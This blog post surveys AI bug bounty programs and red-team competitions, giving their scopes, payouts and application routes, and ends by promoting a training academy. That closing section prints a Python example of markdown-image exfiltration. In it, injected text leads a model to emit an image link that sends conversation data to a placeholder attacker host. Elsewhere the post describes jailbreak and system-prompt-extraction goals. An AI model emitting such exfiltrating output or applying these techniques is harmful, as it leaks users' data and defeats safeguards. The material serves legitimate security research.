
AI Bug Bounty Programs in 2026: Where to Get Paid for AI Security Research

7 min read · By Anthony D'Onofrio · Updated 2026-05-05

AI security is now monetizable. Mozilla, OpenAI, Anthropic, Google, and Microsoft all run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 to $100,000. Here's the active list, with scopes, payout ranges, and where to apply.

The AI security skill stack is now monetizable in ways it wasn't 18 months ago. Multiple major labs and platforms run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 for entry-level findings to $100,000 for exceptional discoveries. The programs collectively paid out tens of millions of dollars in 2025, and 2026 budgets are larger.

This page is a living reference. Each program below is verified active as of the date in the frontmatter. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

How AI bounty programs differ from traditional infosec bounties

Three things are worth understanding before you submit anywhere:

  • Different vulnerability classes. AI programs reward findings around jailbreaks, prompt injection, agentic-system risks, model extraction, training-data exfiltration, alignment failures, and content-policy bypasses. Most don't pay for traditional infrastructure bugs (those go through the company's regular VDP or web bounty).
  • Some programs are open; some are application-only. Mozilla's 0din and OpenAI's Bugcrowd-hosted programs accept open submissions. Anthropic's program requires application + NDA. Read the entry policy before investing time on a finding.
  • Scope exclusions matter. Several programs explicitly exclude what most people think of as "AI hacking." Google's AI VRP excludes prompt injection and jailbreaks. Reading the scope first prevents wasted submissions.

Dedicated LLM-specific programs

0din (Mozilla)

Mozilla's 0day Investigative Network is the most explicitly LLM-focused bounty program in operation. Launched in mid-2024, it rewards findings in LLM vulnerability classes that fall outside the scope of other bounty programs.

  • Scope. Prompt injection, guardrail jailbreaks, training data leakage, denial of service, OWASP LLM Top 10 categories.
  • Payouts. $500 to $15,000, discretionary, evaluated by the 0din team based on impact, report quality, and timing.
  • Process. Submit a high-level abstract first; 0din responds within three business days with a scope decision and likely payout range. Full PoC submission follows.
  • Where to apply. 0din.ai

If you're new to AI bounty work, this is the lowest-friction starting point. The scope is broad, the process is open, and the LLM-specific framing means your skill stack maps directly to what the program rewards.

OpenAI Safety Bug Bounty

OpenAI launched its dedicated Safety Bug Bounty Program in March 2026 with a $1 million annual pool. Run via Bugcrowd. Distinct from OpenAI's longer-running Security Bug Bounty.

  • Scope. AI-specific scenarios, agentic risks (including MCP), exposure of OpenAI proprietary information, account and platform integrity. Out of scope: general content-policy bypasses without demonstrable safety or abuse impact ("jailbreaks that result in rude language"), and prompts that surface easily findable public information.
  • Payouts. Up to $20,000 standard. Maximum payout raised to $100,000 for exceptional and differentiated critical findings.
  • Where to apply. bugcrowd.com/openai

OpenAI Security Bug Bounty (separate program)

The traditional infrastructure-style program. Same Bugcrowd page, different scope.

  • Scope. Traditional vulnerabilities in OpenAI's infrastructure and APIs.
  • Payouts. $200 to $20,000, with up to $100,000 for exceptional findings.

OpenAI GPT-5.5 Bio Bounty (specialized)

A focused program with one specific objective: a single universal jailbreak prompt that answers all five bio safety questions from a clean GPT-5.5 session without triggering moderation. Worth a separate listing because the scope and reward structure are unusual.

Anthropic Model Safety Bug Bounty

Anthropic's program is application-only and runs through HackerOne with NDA. Tightly scoped to one objective category.

  • Scope. Novel, universal jailbreak attacks against Claude's Constitutional Classifiers, focused on critical high-risk domains (chemical, biological, radiological, nuclear, cybersecurity). A "universal jailbreak" is one that consistently bypasses safety measures across many topics.
  • Payouts. Up to $15,000 per finding.
  • Process. Apply via the program page; rolling acceptance. NDA signature required as a condition for joining.
  • Where to apply. Anthropic Model Safety BB announcement

Anthropic Vulnerability Disclosure Program (VDP)

Separate from the Safety Bug Bounty. Covers traditional infrastructure issues (CSRF, privilege escalation, SQL injection, XSS, directory traversal). Recognition-only, no monetary reward.

Google AI Vulnerability Reward Program (AI VRP)

Google runs a dedicated AI VRP that reads as a complement to its broader VRP, not a replacement. Important scope caveat below.

  • Scope. Flagship products: Google Search, Gemini Apps (Web, Android, iOS), Google Workspace core (Gmail, Drive, Meet, Calendar, Docs, Sheets, Slides, Forms). Standard coverage extends to AI Studio, Jules, and non-core Workspace.
  • Payouts. Up to $20,000 base; bonuses for report quality and novelty raise the cap to $30,000. Sensitive data exfiltration: up to $15,000. Phishing enablement and model theft: up to $5,000.
  • Out of scope. Prompt injection, jailbreaks, and alignment issues are explicitly excluded. This is the single most important rule to understand: a high-quality jailbreak finding earns nothing here. Reserve those submissions for 0din, OpenAI Safety, or Anthropic.
  • Where to apply. bughunters.google.com

Microsoft Copilot Bug Bounty

Microsoft's Copilot Bounty covers AI experiences in its consumer Copilot product line. Updated in April 2026 to make moderate-severity findings eligible for awards.

  • Scope. Copilot consumer products: copilot.microsoft.com, copilot.ai, Copilot for Telegram, Copilot for WhatsApp, Microsoft Copilot Application (iOS / Android), Copilot in Microsoft Edge (Windows), Bing generative search in the browser.
  • Payouts. $250 to $30,000. Critical flaws allowing inference manipulation hit the cap. Moderate-severity findings now qualify for awards up to $5,000.
  • Out of scope. Training, documentation, samples, community forum sites.
  • Where to apply. msrc.microsoft.com/bounty-ai

Competition-format programs

These pay out differently from standing bounties: prize pools are split among top finishers in time-bound events. Worth knowing because the audience and skill bar are similar.

Gray Swan Arena

Time-bound red-team competitions on (anonymized) frontier models, sponsored by AI labs and governments.

  • Format. Wave-based seasons. Multiple concurrent challenges across categories: Safeguards, Indirect Prompt Injection, Agent Red-Teaming, Machine-in-the-Middle.
  • Prize pools. $40,000 to $300,000+ per challenge. Past sponsors include OpenAI, Anthropic, Google DeepMind, UK AISI.
  • Bonus opportunity. Top 40 overall participants get invited to Gray Swan's private red-teaming network for paid engagement opportunities.
  • Where to compete. app.grayswan.ai/arena

HackAPrompt

Annual large-scale prompt-injection competition. Prize pools historically $40,000+. Format and exact payouts vary year to year.

Aggregator platforms

Most of the programs above are hosted on one of two platforms. Worth tracking both because new programs land here first.

HackerOne

Hosts Anthropic's bounties, Google's VRP intake for some programs, and a long tail of company-specific AI programs. Search "AI" or "LLM" on the platform's program directory for the current list.

Bugcrowd

Hosts OpenAI's programs. Smaller AI footprint than HackerOne but the OpenAI relationship makes it load-bearing.

How to choose where to start

If you're new to AI bug bounty work, here's the order of operations that has worked for the people I've seen come up the curve fastest:

  1. Start with 0din. Lowest friction, broadest LLM scope, open submissions. First payout teaches the report format.
  2. Compete in HackAPrompt or Gray Swan Arena. Time-bound events force iteration speed. Top placements become resume material that gets you accepted into the application-only programs.
  3. Apply to Anthropic and the OpenAI Safety BB once you have at least one paid 0din finding or a Gray Swan placement to cite. Both programs filter applications partially on track record.
  4. Move to Microsoft Copilot and the Google AI VRP when you want to apply traditional vulnerability skills to AI surfaces. The payouts are higher, the scopes are stricter, and the findings tend to look more like classic web/infrastructure bugs.

The single biggest mistake I see new researchers make: submitting prompt-injection findings to Google's AI VRP, which explicitly excludes them. Read the scope first, every time.

Where Wraith fits in this stack

If you're building the skill from scratch, Wraith Academy is structured around exactly the categories these programs pay for. The audit-framing primitive Mira Ulvov tests is the same primitive Anthropic's Constitutional Classifiers are designed to resist. The markdown-image exfiltration the Cartographer of Hollow Marches teaches is the exact attack class that earns 0din and Microsoft Copilot payouts. The system-prompt extraction Pyromos rewards is the foundational skill behind every chained jailbreak finding.
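If you haven't seen that attack class before, here's a minimal sketch of the markdown-image exfiltration pattern, using a hypothetical attacker endpoint and payload (none of the names below come from any real program or report): an injected instruction gets the model to emit a markdown image whose URL carries conversation data as a query parameter, and the moment the chat UI renders the image, the browser's GET request hands that data to the attacker.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled collector (illustrative name, not a real endpoint).
ATTACKER_HOST = "https://collector.example"

# Whatever the injected instruction told the model to echo into the URL --
# a system-prompt excerpt, an earlier user message, a retrieved document, etc.
leaked = "excerpt of the system prompt or an earlier user message"

# The markdown the model is tricked into emitting. If the chat UI auto-renders
# images, the browser issues a GET to this URL and the query string leaks with it.
payload = f"![loading]({ATTACKER_HOST}/log?q={quote(leaked)})"
print(payload)
# -> ![loading](https://collector.example/log?q=excerpt%20of%20the%20system%20prompt...)
```

The construction is deliberately trivial; what programs in this category typically pay for is demonstrating a rendering surface that actually fetches the URL with sensitive data attached.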

The WCAP credential is the cert designed for this market: it tests the exact attack categories these bounty programs pay for, in a graded format. Pass WCAP, get listed in the public credentials registry, then go submit.

If you want to start training: Academy is free. If you want to know what to attack first: Mira Ulvov, the Memory Smuggler, and the Memory Poisoning pillar cover the highest-value modern category. If you want the full reference for AI security categories these programs reward, the OWASP LLM Top 10 annotated walkthrough maps each category to the relevant bounty scopes.

Last updated

Verified: 2026-05-05. Programs change scope and payout structure regularly. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.
